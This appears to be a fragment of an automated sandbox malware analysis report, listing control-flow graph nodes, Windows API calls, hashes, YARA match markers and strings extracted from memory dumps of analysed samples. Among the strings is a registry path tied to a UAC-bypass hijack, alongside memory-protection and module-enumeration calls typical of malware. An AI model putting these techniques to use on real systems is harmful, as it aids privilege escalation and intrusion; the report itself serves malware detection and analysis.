7ff7ee4a1394 2 API calls 3595->3597 3596->3595 3598 7ff7ee4a15f3 3597->3598 3598->2946 3599 7ff7ee4a1440 3598->3599 3600 7ff7ee4a1394 2 API calls 3599->3600 3601 7ff7ee4a144f 3600->3601 3602 7ff7ee4a1394 2 API calls 3601->3602 3603 7ff7ee4a1459 3602->3603 3604 7ff7ee4a145e 3603->3604 3605 7ff7ee4a1394 2 API calls 3603->3605 3606 7ff7ee4a1394 2 API calls 3604->3606 3605->3604 3607 7ff7ee4a1468 3606->3607 3608 7ff7ee4a146d 3607->3608 3609 7ff7ee4a1394 2 API calls 3607->3609 3610 7ff7ee4a1394 2 API calls 3608->3610 3609->3608 3611 7ff7ee4a1477 3610->3611 3612 7ff7ee4a147c 3611->3612 3613 7ff7ee4a1394 2 API calls 3611->3613 3614 7ff7ee4a1394 2 API calls 3612->3614 3613->3612 3615 7ff7ee4a1486 3614->3615 3616 7ff7ee4a148b 3615->3616 3617 7ff7ee4a1394 2 API calls 3615->3617 3618 7ff7ee4a1394 2 API calls 3616->3618 3617->3616 3619 7ff7ee4a1495 3618->3619 3620 7ff7ee4a1394 2 API calls 3619->3620 3621 7ff7ee4a149a 3620->3621 3622 7ff7ee4a1394 2 API calls 3621->3622 3623 7ff7ee4a14a9 3622->3623 3624 7ff7ee4a1394 2 API calls 3623->3624 3625 7ff7ee4a14b8 3624->3625 3626 7ff7ee4a1394 2 API calls 3625->3626 3627 7ff7ee4a14c7 3626->3627 3628 7ff7ee4a1394 2 API calls 3627->3628 3629 7ff7ee4a14d6 3628->3629 3630 7ff7ee4a14e5 3629->3630 3631 7ff7ee4a1394 2 API calls 3629->3631 3632 7ff7ee4a1394 2 API calls 3630->3632 3631->3630 3633 7ff7ee4a14ef 3632->3633 3634 7ff7ee4a14f4 3633->3634 3635 7ff7ee4a1394 2 API calls 3633->3635 3636 7ff7ee4a1394 2 API calls 3634->3636 3635->3634 3637 7ff7ee4a14fe 3636->3637 3638 7ff7ee4a1394 2 API calls 3637->3638 3639 7ff7ee4a1503 3638->3639 3640 7ff7ee4a1512 3639->3640 3641 7ff7ee4a1394 2 API calls 3639->3641 3642 7ff7ee4a1394 2 API calls 3640->3642 3641->3640 3643 7ff7ee4a1521 3642->3643 3644 7ff7ee4a1394 2 API calls 3643->3644 3645 7ff7ee4a152b 3644->3645 3646 7ff7ee4a1530 3645->3646 3647 7ff7ee4a1394 2 API calls 3645->3647 3648 7ff7ee4a1394 2 API calls 3646->3648 3647->3646 3649 7ff7ee4a153a 3648->3649 3650 7ff7ee4a153f 3649->3650 3651 

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                            • String ID:
                                                                                            • API String ID: 2643109117-0
                                                                                            • Opcode ID: 2b53ccf195520873a2e917af6671c9f2e66b4ccc906881f89422d3245024f0a5
                                                                                            • Instruction ID: 7b8259355a5a406de27bb65495f8aebc3a40c42174183ccbda4f16f9cca2b8ca
                                                                                            • Opcode Fuzzy Hash: 2b53ccf195520873a2e917af6671c9f2e66b4ccc906881f89422d3245024f0a5
• Instruction Fuzzy Hash: 755139B5E0964380E710BB15E954379A7A1EF4E7A0FC65C33E90D473A1FEBCA4598322

Control-flow Graph

APIs
• NtSetDefaultUILanguage.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE4A1156), ref: 00007FF7EE4A13F7
Memory Dump Source
• Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
• Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
Similarity
• API ID: DefaultLanguage
• String ID:
• API String ID: 598056261-0
• Opcode ID: 12f7f34e5646d7a47c6394ab71dba81ff32d213577a609a8212d1207fc3fc457
• Instruction ID: 98d801d77ccbe1e19afeb01cd0d69047014488d1a3197173d57b722c219c76e0
• Opcode Fuzzy Hash: 12f7f34e5646d7a47c6394ab71dba81ff32d213577a609a8212d1207fc3fc457
• Instruction Fuzzy Hash: 95F03C3190CB4382E610EF11F84022AB3A0FB4A394F424C36F98C03724EF7CE1549B61

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
• Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
Similarity
• API ID: memset$wcscatwcscpywcslen
• String ID: $0$0$@$@
• API String ID: 4263182637-1413854666
• Opcode ID: c0374e99f57159db9168dd41bd58a6aa1b632868761db697d436deb027a0c17b
• Instruction ID: a39d1cf3290a5ed68ba59ee06f6a140e1500ebdcc835baff1a7958f623707394
• Opcode Fuzzy Hash: c0374e99f57159db9168dd41bd58a6aa1b632868761db697d436deb027a0c17b
• Instruction Fuzzy Hash: 9BB1B4A190C6C285F321EB29E4053BBF7A0FF89354F811536EA8C46695EFBCD149CB16

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
• Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
Similarity
• API ID: wcslen$memsetwcscatwcscpywcsncmp
• String ID: 0$X$`
• API String ID: 329590056-2527496196
• Opcode ID: 048c2398568d0800d11cdb0fb5f1a267ba7517e309314ff7a549fe036a4ef88d
• Instruction ID: 2b2b2eab87998870a538e29fe3536c4c37c6643414bd94d85fa2726db2de0fc9
• Opcode Fuzzy Hash: 048c2398568d0800d11cdb0fb5f1a267ba7517e309314ff7a549fe036a4ef88d
• Instruction Fuzzy Hash: E502C772908BC281E720DB19E4443AAB7A0FB89764F814736EA9C437E5EFBCD148C715

Control-flow Graph

APIs
• VirtualQuery.KERNEL32(?,?,?,?,00007FF7EE4A93AC,00007FF7EE4A93AC,?,?,00007FF7EE4A0000,?,00007FF7EE4A1991), ref: 00007FF7EE4A1C63
• VirtualProtect.KERNEL32(?,?,?,?,00007FF7EE4A93AC,00007FF7EE4A93AC,?,?,00007FF7EE4A0000,?,00007FF7EE4A1991), ref: 00007FF7EE4A1CC7
• memcpy.MSVCRT ref: 00007FF7EE4A1CE0
• GetLastError.KERNEL32(?,?,?,?,00007FF7EE4A93AC,00007FF7EE4A93AC,?,?,00007FF7EE4A0000,?,00007FF7EE4A1991), ref: 00007FF7EE4A1D23
Strings
Memory Dump Source
• Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
• Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
Similarity
• API ID: Virtual$ErrorLastProtectQuerymemcpy
• String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
• API String ID: 2595394609-2123141913
• Opcode ID: cb1764b4d40c7b3cd8d53eb81bd19f74b1d4bb87b7ad2fc799354775426d0bf5
• Instruction ID: e195374ccbb3d61326138bf35aeb5d867247c6b485798ae8a0d9cf1fa58b8953
• Opcode Fuzzy Hash: cb1764b4d40c7b3cd8d53eb81bd19f74b1d4bb87b7ad2fc799354775426d0bf5
• Instruction Fuzzy Hash: D74194F1A0855385FB10AB01D4447B8A750EB4ABA4FD64C33EE0D477A1EEBCE549C322

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
• Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
Similarity
• API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
• String ID:
• API String ID: 3326252324-0
• Opcode ID: 369838192b3f6a9457ac0e282590e13b5ac60ae82803ec82e43dce6996ba929d
• Instruction ID: 6299dd41bc2f31ae82eadf1ec467fe591a9cf756c2926c020afea752750f6f92
• Opcode Fuzzy Hash: 369838192b3f6a9457ac0e282590e13b5ac60ae82803ec82e43dce6996ba929d
• Instruction Fuzzy Hash: E321FF71E0990381F655AB11F944374A261FF4ABA0FC60833D90D477A4EFBCB85A9326

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
• Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
Similarity
• API ID:
• String ID: CCG
• API String ID: 0-1584390748
• Opcode ID: 88f5887b5313669d61e74955578d1318dfdb425a374c820e70499acdf5c62993
• Instruction ID: f3425ec8af2b1329c7a029891196f53a81b6d5e5985618cb53473975ac855759
• Opcode Fuzzy Hash: 88f5887b5313669d61e74955578d1318dfdb425a374c820e70499acdf5c62993
• Instruction Fuzzy Hash: 7E21EFE1E0818341FB757A14958037991819F8A774FA78D33FD1E473D4FEBCA88A8226

Control-flow Graph

APIs
• VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE4A1247), ref: 00007FF7EE4A19F9
Strings
Memory Dump Source
• Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
• Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
Similarity
• API ID: ProtectVirtual
• String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
• API String ID: 544645111-395989641
• Opcode ID: 93bdf84029d068f56074ddd8b9ba6012cff20265fe349589ca7ebf28d2f061c0
• Instruction ID: 02565b26e50bcf4ba55d22782204a51f7694cdd46376f7668e2458db73d4077c
• Opcode Fuzzy Hash: 93bdf84029d068f56074ddd8b9ba6012cff20265fe349589ca7ebf28d2f061c0
• Instruction Fuzzy Hash: CF51B5A1F04543C6EB10AB11D8447B4A761EB1A7B4F864D33E91C07794EEBCE49AC722

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
• Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
Similarity
• API ID: fprintf
• String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
• API String ID: 383729395-3474627141
• Opcode ID: 734c1bc93119674d019ef67c840bcff02c3ba548de9bf7d395623722429a4793
• Instruction ID: 09e49b7207cbe742dee4ff492e6cb495a2ed55b538b347f1dab7f25565962528
• Opcode Fuzzy Hash: 734c1bc93119674d019ef67c840bcff02c3ba548de9bf7d395623722429a4793
• Instruction Fuzzy Hash: 2AF04C21E0898682E310BB24A9042BDE320EB5A3E0F818A32FF4D57241FF7CF186C310

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000001B.00000002.1476971915.00007FF7EE4A1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7EE4A0000, based on PE: true
• Associated: 0000001B.00000002.1476934520.00007FF7EE4A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477047971.00007FF7EE4A8000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477327674.00007FF7EE4AA000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477686601.00007FF7EE729000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001B.00000002.1477716145.00007FF7EE72C000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_7ff7ee4a0000_vueqjgslwynd.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveValue
• String ID:
• API String ID: 682475483-0
• Opcode ID: 844f6d217ff74ff32d443163d169c904dbc537589d089fe909406bc73ab79a72
• Instruction ID: e7831efc178b7a912b065bbb13bc5baeece3a2defee6fb794b51b76972df9a2c
• Opcode Fuzzy Hash: 844f6d217ff74ff32d443163d169c904dbc537589d089fe909406bc73ab79a72
• Instruction Fuzzy Hash: C8010C35A0960381E655AB11FE44374A220EF49BA0F860833DA0D47B50FFBCB9599226

Execution Graph

Execution Coverage: 4.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 12
Total number of Limit Nodes: 1
                                                                                            APIs
                                                                                            • GetNumberFormatW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401554
                                                                                              • Part of subcall function 00401930: __indefinite.LIBCMT ref: 00402B87
                                                                                            • __floor_pentium4.LIBCMT ref: 004014DB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000001.1462803885.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00401000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_1_401000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatNumber__floor_pentium4__indefinite
                                                                                            • String ID: E~|x$Qm
                                                                                            • API String ID: 2030598621-2757335022
                                                                                            • Opcode ID: b32e833bb58926868de330e06c19b01d26b5bdae2a7c28d3054e68a455d10f84
                                                                                            • Instruction ID: 73985604538cdd5685153801c214ae0a0d39f512be01b4a662099dd89bdb8629
                                                                                            • Opcode Fuzzy Hash: b32e833bb58926868de330e06c19b01d26b5bdae2a7c28d3054e68a455d10f84
                                                                                            • Instruction Fuzzy Hash: 3731A5B1E043109FC3119F2DDD8550ABBE8FB98754F014A7EF45AAB2F2D63898408BD9
                                                                                            APIs
                                                                                            • LocalAlloc.KERNELBASE(00000000), ref: 004012B3
                                                                                            • VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 004012CB
                                                                                              • Part of subcall function 00401BCA: __wcstoi64.LIBCMT ref: 00401BD6
                                                                                              • Part of subcall function 0040123E: _strcat.LIBCMT ref: 00401244
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000001.1462803885.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00401000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_1_401000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocLocalProtectVirtual__wcstoi64_strcat
                                                                                            • String ID:
                                                                                            • API String ID: 2486670240-0
                                                                                            • Opcode ID: d6dbba6c9f6b0861d33ed659708737630cea1a9671ab7ce7f81f231f642289e2
                                                                                            • Instruction ID: 8be1ec911b5a2543e4fe96f7871ea4dd59ea00270996b7423bd8d5e6e982b0d8
                                                                                            • Opcode Fuzzy Hash: d6dbba6c9f6b0861d33ed659708737630cea1a9671ab7ce7f81f231f642289e2
                                                                                            • Instruction Fuzzy Hash: 3151A271905614ABD751ABA1EC4DAEF3B6CFF15305F008125F509E22B0CB386542CBB8

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0299E7EE
                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0299E80E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000002.1591101509.000000000299E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0299E000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_2_299e000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 3833638111-0
                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction ID: 3ebec6b5c4e2cef199a92337a3e647d8d97059172f6f15263af28ea6756ed454
                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction Fuzzy Hash: 64F096312007156FDB207BFDA88DBAE76ECAF89635F10052AF687914C0DB70E8454A61
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNELBASE(0081D678,00401449), ref: 00401070
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000001.1462803885.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00401000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_1_401000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 5917c715bfe6e1d03dbea019a9f9131d8b002cc3af8c145fa692876eb5b913ec
                                                                                            • Instruction ID: 019890be7eb8b6ef552ab5dc434fb2854a1f395abc86a746e8410f5877666c50
                                                                                            • Opcode Fuzzy Hash: 5917c715bfe6e1d03dbea019a9f9131d8b002cc3af8c145fa692876eb5b913ec
                                                                                            • Instruction Fuzzy Hash: 96F05465698384D8F6008BF0BC21B752329FF60B50F11D407F508CF2F5F2A60990D799
                                                                                            APIs
                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00404E5B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000001.1462803885.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00401000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_1_401000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 10892065-0
                                                                                            • Opcode ID: fbb79b3ce6b16800176ca7d6b405fc1c1dd4e1a840c0fe1b0aaad099444b00f5
                                                                                            • Instruction ID: 26c44c399ed0e66b42f290df7f571b8cdaa9e6ead15ce4745b4eb1f55b5a12a5
                                                                                            • Opcode Fuzzy Hash: fbb79b3ce6b16800176ca7d6b405fc1c1dd4e1a840c0fe1b0aaad099444b00f5
                                                                                            • Instruction Fuzzy Hash: 81D05E72954305AADB105FB1AC087A33BDCF784795F148436B91DC6690F674D550C544

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 13 299e485-299e4bf call 299e798 16 299e50d 13->16 17 299e4c1-299e4f4 VirtualAlloc call 299e512 13->17 16->16 19 299e4f9-299e50b 17->19 19->16
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0299E4D6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000002.1591101509.000000000299E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0299E000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_2_299e000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction ID: e17333c3d16672ffb06eec398476f3e116f6d5c54ab12b96f445e3620a83d67d
                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction Fuzzy Hash: CB113C79A00208EFDB01DF98C985E99BFF5AF08351F058095F9889B361D371EA90EF81

                                                                                            Control-flow Graph

                                                                                            Strings
                                                                                            • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                            • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                            • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                            • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                            • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                            • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                            • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                            • %, xrefs: 00433B64
                                                                                            • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                            • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000020.00000002.1587040107.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000840000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000ACD000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000C77000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000C7A000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CCF000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CD3000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CEF000.00000040.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000020.00000002.1587040107.0000000000CF6000.00000040.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_32_2_400000_288c47bbc1871b439df19ff4df68f076.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
